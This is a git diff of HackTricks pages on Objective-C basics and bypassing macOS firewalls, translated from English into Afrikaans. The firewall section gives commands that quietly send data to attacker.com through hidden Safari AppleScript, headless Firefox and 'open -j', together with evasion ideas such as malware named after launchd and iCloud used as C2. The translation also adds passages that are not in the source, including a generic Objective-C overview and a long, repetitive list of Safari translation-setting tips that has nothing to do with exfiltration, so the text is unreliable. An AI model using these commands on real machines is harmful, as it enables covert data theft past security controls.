-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md b/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md index fbd940b39..0dbc94229 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md @@ -2,40 +2,37 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
## Objective-C {% hint style="danger" %} -Note that programs written in Objective-C **retain** their class declarations **when** **compiled** into [Mach-O binaries](macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md). Such class declarations **include** the name and type of: +Let daarop dat programme geskryf in Objective-C **hul klasverklarings behou** wanneer hulle gekompileer word in [Mach-O-binêre](macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md). Sulke klasverklarings **bevat** die naam en tipe van: {% endhint %} -* The class -* The class methods -* The class instance variables - -You can get this information using [**class-dump**](https://github.com/nygard/class-dump): +* Die klas +* Die klasmetodes +* Die klas-instansie-variables +Jy kan hierdie inligting kry deur [**class-dump**](https://github.com/nygard/class-dump) te gebruik: ```bash class-dump Kindle.app ``` +Let wel dat hierdie name geobfuskeer kan word om die omkeer van die binêre kode moeiliker te maak. -Note that this names could be obfuscated to make the reversing of the binary more difficult. - -## Classes, Methods & Objects - -### Interface, Properties & Methods +## Klasse, Metodes & Objekte +### Koppelvlak, Eienskappe & Metodes ```objectivec // Declare the interface of the class @interface MyVehicle : NSObject @@ -50,29 +47,25 @@ Note that this names could be obfuscated to make the reversing of the binary mor @end ``` - -### **Class** - +### **Klas** ```objectivec @implementation MyVehicle : NSObject // No need to indicate the properties, only define methods - (void)startEngine { - NSLog(@"Engine started"); +NSLog(@"Engine started"); } - (void)addWheels:(int)value { - self.numberOfWheels += value; +self.numberOfWheels += value; } @end ``` +### **Objek & Roep Metode Aan** -### **Object & Call Method** - -To create an instance of a class the **`alloc`** method is called which **allocate memory** for each **property** and **zero** those allocations. Then **`init`** is called, which **initilize the properties** to the **required values**. - +Om 'n instansie van 'n klas te skep, word die **`alloc`**-metode geroep wat geheue toewys vir elke **eienskap** en dit **nulstel**. Dan word **`init`** geroep, wat die eienskappe **inisialiseer** na die **vereiste waardes**. ```objectivec // Something like this: MyVehicle *newVehicle = [[MyVehicle alloc] init]; @@ -84,19 +77,15 @@ MyVehicle *newVehicle = [MyVehicle new]; // [myClassInstance nameOfTheMethodFirstParam:param1 secondParam:param2] [newVehicle addWheels:4]; ``` +### **Klasmetodes** -### **Class Methods** - -Class methods are defined with the **plus sign** (+) not the hyphen (-) that is used with instance methods. Like the **NSString** class method **`stringWithString`**: - +Klasmetodes word gedefinieer met die **plusteken** (+) en nie die strepie (-) wat gebruik word met instansiemetodes. Soos die **NSString** klasmetode **`stringWithString`**: ```objectivec + (id)stringWithString:(NSString *)aString; ``` - ### Setter & Getter -To **set** & **get** properties, you could do it with a **dot notation** or like if you were **calling a method**: - +Om eienskappe te **stel** en **kry**, kan jy dit doen met 'n **puntnotasie** of asof jy 'n **metode aanroep**: ```objectivec // Set newVehicle.numberOfWheels = 2; @@ -106,24 +95,20 @@ newVehicle.numberOfWheels = 2; NSLog(@"Number of wheels: %i", newVehicle.numberOfWheels); NSLog(@"Number of wheels: %i", [newVehicle numberOfWheels]); ``` +### **Instansie Veranderlikes** -### **Instance Variables** - -Alternatively to setter & getter methods you can use instance variables. These variables have the same name as the properties but starting with a "\_": - +Alternatiewelik tot setter- en getter-metodes kan jy instansie veranderlikes gebruik. Hierdie veranderlikes het dieselfde naam as die eienskappe, maar begin met 'n "\_": ```objectivec - (void)makeLongTruck { - _numberOfWheels = +10000; - NSLog(@"Number of wheels: %i", self.numberOfLeaves); +_numberOfWheels = +10000; +NSLog(@"Number of wheels: %i", self.numberOfLeaves); } ``` +### Protokolle -### Protocols - -Protocols are set of method declarations (without properties). A class that implements a protocol implement the declared methods. - -There are 2 types of methods: **mandatory** and **optional**. By **default** a method is **mandatory** (but you can also indicate it with a **`@required`** tag). To indicate that a method is optional use **`@optional`**. +Protokolle is 'n stel metodeverklarings (sonder eienskappe). 'n Klas wat 'n protokol implementeer, implementeer die verklaarde metodes. +Daar is 2 tipes metodes: **verpligtend** en **opsioneel**. Standaard is 'n metode **verpligtend** (maar jy kan dit ook aandui met 'n **`@required`** etiket). Om aan te dui dat 'n metode opsioneel is, gebruik **`@optional`**. ```objectivec @protocol myNewProtocol - (void) method1; //mandatory @@ -133,9 +118,55 @@ There are 2 types of methods: **mandatory** and **optional**. By **default** a m - (void) method3; //optional @end ``` +### Alles saam -### All together +Hier is 'n oorsig van die belangrikste aspekte van die Objective-C-programmeertaal: +#### Klasdefinisies + +Klasdefinisies word gebruik om die eienskappe en gedrag van 'n objek te beskryf. Dit sluit in die definisie van instansie- en klasmetodes, eienskappe en protokolle. + +#### Metodes + +Metodes is funksies wat spesifieke gedrag aan 'n objek toeken. Dit kan instansie- of klasmetodes wees. + +#### Eienskappe + +Eienskappe is veranderlikes wat die toestand van 'n objek voorstel. Dit kan openbaar of privaat wees. + +#### Protokolle + +Protokolle definieer 'n stel vereistes wat 'n klas moet nakom. Dit maak interaksie tussen klasse moontlik sonder om 'n gemeenskaplike basisimplementering te vereis. + +#### Inhouding + +Inhouding is die proses waarin 'n klas die eienskappe en metodes van 'n ander klas erwe. Dit maak hergebruik van kode moontlik en bevorder die herbruikbaarheid en onderhoudbaarheid van programme. + +#### Polimorfisme + +Polimorfisme verwys na die vermoë van 'n objek om verskillende vorme aan te neem. Dit maak dit moontlik om 'n enkele metode te gebruik om verskillende tipes objekte te hanteer. + +#### Geheuebestuur + +Objective-C maak gebruik van handmatige geheuebestuur. Dit beteken dat die ontwikkelaar verantwoordelik is vir die toekenning en vrylating van geheue vir objekte. + +#### Uitsonderingshantering + +Objective-C bied 'n stelsel vir die hantering van uitsonderings. Dit maak dit moontlik om fouttoestande te hanteer en te herstel. + +#### Delegasie + +Delegasie is 'n ontwerppatroon wat gebruik word om die verantwoordelikhede van 'n objek na 'n ander objek te skuif. Dit bevorder die herbruikbaarheid en modulariteit van kode. + +#### Kategorieë + +Kategorieë maak dit moontlik om bestaande klasse uit te brei sonder om die oorspronklike bronkode te wysig. Dit bied 'n manier om funksionaliteit by te voeg sonder om 'n nuwe klasse te skep. + +#### Blokke + +Blokke is stukke kode wat as argumente aan metodes kan oorgedra word. Dit maak dit moontlik om funksionaliteit dinamies te verander en te hergebruik. + +Hierdie konsepte is van kritieke belang vir die begrip van Objective-C en sal jou help om effektief te programmeer in hierdie taal. ```objectivec // gcc -framework Foundation test_obj.m -o test_obj #import @@ -161,32 +192,31 @@ There are 2 types of methods: **mandatory** and **optional**. By **default** a m @implementation MyVehicle : NSObject - (void)startEngine { - NSLog(@"Engine started"); +NSLog(@"Engine started"); } - (void)addWheels:(int)value { - self.numberOfWheels += value; +self.numberOfWheels += value; } - (void)makeLongTruck { - _numberOfWheels = +10000; - NSLog(@"Number of wheels: %i", self.numberOfWheels); +_numberOfWheels = +10000; +NSLog(@"Number of wheels: %i", self.numberOfWheels); } @end int main() { - MyVehicle* mySuperCar = [MyVehicle new]; - [mySuperCar startEngine]; - mySuperCar.numberOfWheels = 4; - NSLog(@"Number of wheels: %i", mySuperCar.numberOfWheels); - [mySuperCar setNumberOfWheels:3]; - NSLog(@"Number of wheels: %i", mySuperCar.numberOfWheels); - [mySuperCar makeLongTruck]; +MyVehicle* mySuperCar = [MyVehicle new]; +[mySuperCar startEngine]; +mySuperCar.numberOfWheels = 4; +NSLog(@"Number of wheels: %i", mySuperCar.numberOfWheels); +[mySuperCar setNumberOfWheels:3]; +NSLog(@"Number of wheels: %i", mySuperCar.numberOfWheels); +[mySuperCar makeLongTruck]; } ``` - -### Basic Classes +### Basiese Klasse #### String @@ -199,7 +229,7 @@ NSString *bookPublicationYear = [NSString stringWithCString:"1951" encoding:NSUT ``` {% endcode %} -Basic classes are **immutable**, so to append a string to an existing one a **new NSString needs to be created**. +Basiese klasse is **onveranderlik**, so om 'n string by 'n bestaande een te voeg, moet 'n **nuwe NSString geskep word**. {% code overflow="wrap" %} ```objectivec @@ -207,7 +237,7 @@ NSString *bookDescription = [NSString stringWithFormat:@"%@ by %@ was published ``` {% endcode %} -Or you could also use a **mutable** string class: +Of jy kan ook 'n **veranderlike** string klas gebruik: {% code overflow="wrap" %} ```objectivec @@ -220,7 +250,7 @@ NSMutableString *mutableString = [NSMutableString stringWithString:@"The book "] ``` {% endcode %} -#### Number +#### Nommer {% code overflow="wrap" %} ```objectivec @@ -241,9 +271,7 @@ NSNumber *piDouble = @3.1415926535; // equivalent to [NSNumber numberWithDouble: NSNumber *yesNumber = @YES; // equivalent to [NSNumber numberWithBool:YES] NSNumber *noNumber = @NO; // equivalent to [NSNumber numberWithBool:NO] ``` -{% endcode %} - -#### Array, Sets & Dictionary +#### Reeks, Stelle & Woordeboek {% code overflow="wrap" %} ```objectivec @@ -272,18 +300,18 @@ NSMutableSet *mutFruitsSet = [NSMutableSet setWithObjects:@"apple", @"banana", @ // Dictionary NSDictionary *fruitColorsDictionary = @{ - @"apple" : @"red", - @"banana" : @"yellow", - @"orange" : @"orange", - @"grape" : @"purple" +@"apple" : @"red", +@"banana" : @"yellow", +@"orange" : @"orange", +@"grape" : @"purple" }; // In dictionaryWithObjectsAndKeys you specify the value and then the key: NSDictionary *fruitColorsDictionary2 = [NSDictionary dictionaryWithObjectsAndKeys: - @"red", @"apple", - @"yellow", @"banana", - @"orange", @"orange", - @"purple", @"grape", +@"red", @"apple", +@"yellow", @"banana", +@"orange", @"orange", +@"purple", @"grape", nil]; // Mutable dictionary @@ -293,50 +321,46 @@ NSMutableDictionary *mutFruitColorsDictionary = [NSMutableDictionary dictionaryW ``` {% endcode %} -### Blocks +### Blokke -Blocks are **functions that behaves as objects** so they can be passed to functions or **stored** in **arrays** or **dictionaries**. Also, they can **represent a value if they are given values** so it's similar to lambdas. - -{% code overflow="wrap" %} +Blokke is **funksies wat as objekte optree**, sodat hulle aan funksies kan word oorgedra of in **arrays** of **woordeboeke** kan word **gestoor**. Hulle kan ook **'n waarde verteenwoordig as daar waardes aan hulle gegee word**, so dit is soortgelyk aan lambdas. ```objectivec returnType (^blockName)(argumentType1, argumentType2, ...) = ^(argumentType1 param1, argumentType2 param2, ...){ - //Perform operations here +//Perform operations here }; // For example -int (^suma)(int, int) = ^(int a, int b){ - return a+b; +int (^suma)(int, int) = ^(int a, int b){ +return a+b; }; NSLog(@"3+4 = %d", suma(3,4)); ``` {% endcode %} -It's also possible to **define a block type to be used as a parameter** in functions: - +Dit is ook moontlik om **'n blok tipe te definieer wat as 'n parameter gebruik kan word** in funksies: ```objectivec // Define the block type typedef void (^callbackLogger)(void); // Create a bloack with the block type -callbackLogger myLogger = ^{ - NSLog(@"%@", @"This is my block"); +callbackLogger myLogger = ^{ +NSLog(@"%@", @"This is my block"); }; // Use it inside a function as a param void genericLogger(callbackLogger blockParam) { - NSLog(@"%@", @"This is my function"); - blockParam(); +NSLog(@"%@", @"This is my function"); +blockParam(); } genericLogger(myLogger); // Call it inline genericLogger(^{ - NSLog(@"%@", @"This is my second block"); +NSLog(@"%@", @"This is my second block"); }); ``` - -### Files +### Lêers {% code overflow="wrap" %} ```objectivec @@ -345,35 +369,33 @@ NSFileManager *fileManager = [NSFileManager defaultManager]; // Check if file exists: if ([fileManager fileExistsAtPath:@"/path/to/file.txt" ] == YES) { - NSLog (@"File exists"); +NSLog (@"File exists"); } // copy files if ([fileManager copyItemAtPath: @"/path/to/file1.txt" toPath: @"/path/to/file2.txt" error:nil] == YES) { - NSLog (@"Copy successful"); +NSLog (@"Copy successful"); } // Check if the content of 2 files match if ([fileManager contentsEqualAtPath:@"/path/to/file1.txt" andPath:@"/path/to/file2.txt"] == YES) { - NSLog (@"File contents match"); +NSLog (@"File contents match"); } // Delete file if ([fileManager removeItemAtPath:@"/path/to/file1.txt" error:nil]) { - NSLog(@"Removed successfully"); +NSLog(@"Removed successfully"); } ``` {% endcode %} -It's also possible to manage files **using `NSURL` objects instead of `NSString`** objects. The method names are similar, but **with `URL` instead of `Path`**. - +Dit is ook moontlik om lêers te bestuur **deur gebruik te maak van `NSURL`-voorwerpe in plaas van `NSString`-voorwerpe**. Die metode name is soortgelyk, maar **met `URL` in plaas van `Path`**. ```objectivec NSURL *fileSrc = [NSURL fileURLWithPath:@"/path/to/file1.txt"]; NSURL *fileDst = [NSURL fileURLWithPath:@"/path/to/file2.txt"]; [fileManager moveItemAtURL:fileSrc toURL:fileDst error: nil]; ``` - -Most basic classes has a method `writeToFile: atomically: encoding: error:nil` defined that allows them to be directly be written to a file: +Die meeste basiese klasse het 'n metode `writeToFile: atomically: encoding: error:nil` wat dit moontlik maak om hulle direk na 'n lêer te skryf: {% code overflow="wrap" %} ```objectivec @@ -384,14 +406,14 @@ NSString* tmp = @"something temporary";
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md b/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md index 8f416f72e..49afd662b 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md @@ -1,70 +1,66 @@ -# macOS Bypassing Firewalls +# macOS Deurloophardeware
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Found techniques +## Gevonde tegnieke -The following techniques were found working in some macOS firewall apps. +Die volgende tegnieke is gevind om te werk in sommige macOS-firewalltoepassings. -### Abusing whitelist names +### Misbruik van witlysname -* For example calling the malware with names of well known macOS processes like **`launchd`** +* Byvoorbeeld om die kwaadwillige sagteware te noem met name van bekende macOS-prosesse soos **`launchd`** -### Synthetic Click +### Sintetiese Klik -* If the firewall ask for permission to the user make the malware **click on allow** +* As die firewall toestemming van die gebruiker vra, laat die kwaadwillige sagteware **klik op toelaat** -### **Use Apple signed binaries** +### **Gebruik Apple-ondertekende binaêre lêers** -* Like **`curl`**, but also others like **`whois`** +* Soos **`curl`**, maar ook ander soos **`whois`** -### Well known apple domains +### Bekende Apple-domeine -The firewall could be allowing connections to well known apple domains such as **`apple.com`** or **`icloud.com`**. And iCloud could be used as a C2. +Die firewall kan verbinding met bekende Apple-domeine soos **`apple.com`** of **`icloud.com`** toelaat. En iCloud kan as 'n C2 gebruik word. -### Generic Bypass +### Generiese Deurloop -Some ideas to try to bypass firewalls +Sommige idees om deur firewalls te loop -### Check allowed traffic - -Knowing the allowed traffic will help you identify potentially whitelisted domains or which applications are allowed to access them +### Kontroleer toegelate verkeer +Om die toegelate verkeer te ken, sal jou help om potensieel witlys-domeine te identifiseer of watter toepassings toegelaat word om daarmee te kommunikeer ```bash lsof -i TCP -sTCP:ESTABLISHED ``` +### Misbruik van DNS -### Abusing DNS - -DNS resolutions are done via **`mdnsreponder`** signed application which will probably vi allowed to contact DNS servers. +DNS-oplossings word gedoen deur die **`mdnsreponder`** ondertekende toepassing wat waarskynlik toegelaat sal word om kontak te maak met DNS-bedieners.
https://www.youtube.com/watch?v=UlT5KFTMn2k
-### Via Browser apps +### Via Blaaier-toepassings * **oascript** - ```applescript tell application "Safari" - run - tell application "Finder" to set visible of process "Safari" to false - make new document - set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil +run +tell application "Finder" to set visible of process "Safari" to false +make new document +set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil end tell ``` - * Google Chrome {% code overflow="wrap" %} @@ -74,39 +70,57 @@ end tell {% endcode %} * Firefox - ```bash firefox-bin --headless "https://attacker.com?data=data%20to%20exfil" ``` +# Safari -* Safari +Safari is 'n webblaaier wat standaard op macOS geïnstalleer is. Dit kan gebruik word om webwerwe te besoek en aanlyninhoud te sien. Hier is 'n paar nuttige wenke en truuks om Safari te gebruik: +- **Bladsyvertaling**: Safari het 'n ingeboude vertalingsfunksie wat jou kan help om webbladsye in 'n ander taal te vertaal. Klik eenvoudig op die vertalingsknoppie in die adresbalk en kies die gewenste taal. + +- **Bladsy-eksklusie**: As jy nie wil hê dat 'n sekere webbladsy vertaal moet word nie, kan jy dit uitsluit van die vertalingsproses. Klik op die vertalingsknoppie en kies "Uitsluit hierdie bladsy" om die vertaling te verhoed. + +- **Bladsyvertaling uitskakel**: As jy nie die vertalingsfunksie in Safari wil gebruik nie, kan jy dit uitskakel. Gaan na Safari-voorkeure, klik op die "Weergawe" -bladsy en skakel die "Vertalingsfunksie" af. + +- **Bladsy-eksklusie ongedaan maak**: As jy 'n webbladsy uitgesluit het van vertaling en jy wil dit weer insluit, klik op die vertalingsknoppie en kies "Sluit hierdie bladsy in". + +- **Bladsyvertalingstale**: Jy kan die voorkeurvertalingstale in Safari instel. Gaan na Safari-voorkeure, klik op die "Weergawe" -bladsy en kies die gewenste tale in die "Vertalingsfunksie" -afdeling. + +- **Bladsyvertalingstale prioriteite**: As jy wil hê dat Safari sekere tale voor ander vertaal, kan jy die prioriteite van die vertalingstale instel. Gaan na Safari-voorkeure, klik op die "Weergawe" -bladsy en rangskik die tale in die "Vertalingsfunksie" -afdeling volgens jou voorkeur. + +- **Bladsyvertaling uitskakel vir 'n spesifieke webwerf**: As jy nie wil hê dat Safari 'n spesifieke webwerf vertaal nie, kan jy dit uitskakel. Klik op die vertalingsknoppie terwyl jy op die webwerf is en kies "Uitsluit hierdie webwerf". + +- **Bladsyvertaling uitskakel vir alle webwerwe**: As jy nie wil hê dat Safari enige webwerf vertaal nie, kan jy dit uitskakel. Gaan na Safari-voorkeure, klik op die "Weergawe" -bladsy en skakel die "Vertalingsfunksie" af. + +- **Bladsyvertaling uitskakel vir 'n spesifieke taal**: As jy nie wil hê dat Safari 'n spesifieke taal vertaal nie, kan jy dit uitskakel. Gaan na Safari-voorkeure, klik op die "Weergawe" -bladsy en skakel die betrokke taal af in die "Vertalingsfunksie" -afdeling. + +- **Bladsyvertaling uitskakel vir 'n spesifieke webwerf en taal**: As jy nie wil hê dat Safari 'n spesifieke webwerf en taal vertaal nie, kan jy dit uitskakel. Klik op die vertalingsknoppie terwyl jy op die webwerf is en kies "Uitsluit hierdie webwerf en taal". ```bash open -j -a Safari "https://attacker.com?data=data%20to%20exfil" ``` +### Via prosesinjeksies -### Via processes injections - -If you can **inject code into a process** that is allowed to connect to any server you could bypass the firewall protections: +As jy **kode kan inspuit in 'n proses** wat toegelaat word om met enige bediener te verbind, kan jy die vuurmuurbeveiliging omseil: {% content-ref url="macos-proces-abuse/" %} [macos-proces-abuse](macos-proces-abuse/) {% endcontent-ref %} -## References +## Verwysings * [https://www.youtube.com/watch?v=UlT5KFTMn2k](https://www.youtube.com/watch?v=UlT5KFTMn2k)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md b/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md index ac2fbd018..df9847a99 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md @@ -1,55 +1,55 @@ -# macOS Defensive Apps +# macOS Verdedigingsprogramme
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
